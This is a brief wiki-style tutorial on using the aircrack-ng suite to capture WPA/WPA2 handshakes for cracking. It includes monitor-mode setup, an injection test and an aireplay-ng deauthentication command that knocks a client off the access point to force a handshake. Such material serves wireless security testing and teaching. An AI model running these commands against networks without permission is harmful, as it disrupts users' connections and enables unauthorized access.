#summary Instructions for setting up how to capture wireless data

= Prerequisites =
  # aircrack-ng suite (we will be using airmon-ng, aireplay-ng, airodump-ng in this article)
  # A compatible wireless card
  # MAC address of the access point(AP) `<MAC_AP>`
  # Channel used by AP `<CHANNEL_AP>`
  # Wireless interface used for packet capture `<WLANX>`

= Injection Test =
Before you can start packet capture, you must test whether you can successfully perform an injection test to make sure that your wireless card works with aircrack-ng suite of tools.
 # Step 1: Set your card to monitor mode
{{{
airmon-ng start <WLANX> <CHANNEL_AP>
}}}

 # Step 2: Use aireplay-ng to perform injection
{{{
 aireplay-ng --test -a <MAC_AP> <WLANX>
}}}
Analyse the output to see your wireless card can successfully inject packets.

= Packet Capture =

 # Step 1: Set your card to monitor mode
This step is not required, if your card is already in monitor mode.
{{{
airmon-ng start <WLANX> <CHANNEL_AP>
}}}

 # Step 2: Start packet capture
{{{
airodump-ng -c <CHANNEL_AP> --bssid <MAC_AP> -w <CAPTURE_FILENAME> <WLANX>
}}}
Here `<CAPTURE_FILENAME>` is the prefix for files to which the capture is written. Please remember that in order to crack WPA/WPA2-PSK a handshake between a client and AP must be captured by airodump-ng. Therefore, you must continue to capture packets until you see the text "WPA Handshake" on the top-right corner of the airodump-ng screen.

  # Step 3: Deauth a client(Optional, but recommended)
We can use aireplay-ng in order to send a deauthentication packet to a client, which then attempts to reauthenticate with the AP, so that we can capture the handshake between the client and AP. While airodump-ng is running, please make note of the MAC address of a client `<MAC_CLIENT>` currently connected to the AP and in a separate console run the following command.
{{{
aireplay-ng -0 <NUM_PACKETS> -a <MAC_AP> -c <MAC_client> <WLANX>
}}}
Here `<NUM_PACKETS>` is the number of deauthentication packets to send. Usually a single packet is enough, but you may want to re-try with more packets, in case of failed attempts.

= References =
  * [http://www.aircrack-ng.org/]
  * [http://www.aircrack-ng.org/doku.php?id=compatibility_drivers]
  * [http://www.aircrack-ng.org/doku.php?id=cracking_wpa]